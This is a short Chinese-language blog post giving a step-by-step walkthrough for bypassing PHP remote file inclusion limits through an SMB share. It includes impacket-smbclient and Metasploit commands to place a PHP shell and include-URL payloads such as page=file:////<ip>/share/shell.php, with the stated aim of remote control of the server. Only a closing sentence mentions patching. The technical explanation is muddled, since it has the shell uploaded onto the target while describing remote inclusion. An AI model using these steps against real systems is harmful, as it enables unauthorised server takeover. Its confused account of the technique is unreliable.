使用SMB共享来绕过PHP远程文件包含(RFI)的限制执行是一种常见的攻击技术,也被称为SMB马(SMB-backdoor)。在这种攻击中,攻击者会通过构造恶意请求来将恶意文件上传到目标服务器上,然后将其包含到PHP代码中以达到对服务器的远程控制。
以下是完整的攻略步骤:
-
寻找具有远程文件包含漏洞的目标站点。
-
准备一个具有有效文件路径的可上传文件(例如PHP shell)。
-
通过SMB共享将可上传文件上传到目标服务器。可以使用工具如impacket-smbclient或Metasploit的模块进行此操作。
示例:
使用impacket-smbclient:
impacket-smbclient //<ip_address>/share -U <username>%<password>
put shell.php
使用Metasploit的模块:
use auxiliary/admin/smb/smb_phpupload
set RHOST <ip_address>
set SMBUser <username>
set SMBPass <password>
set SHARE myshare
set SHAREDISK C$
set filename shell.php
run
- 构造恶意请求并将可上传文件包含到PHP代码中。为了绕过远程文件包含限制,攻击者可以利用文件协议伪造绝对或相对路径,如file:////
/share/shell.php或../share/shell.php。
示例:
http://<target_url>/index.php?page=file:////<ip_address>/share/shell.php
http://<target_url>/index.php?page=../share/shell.php
- 如果一切顺利,就可以远程控制目标服务器了,使其执行任意命令、访问文件系统等等。
这种攻击技术的危害性非常大,因此建议所有开发人员和服务器管理员都密切关注漏洞信息,进行相应的补丁和安全加固操作。
本站文章如无特殊说明,均为本站原创,如若转载,请注明出处:使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 - Python技术站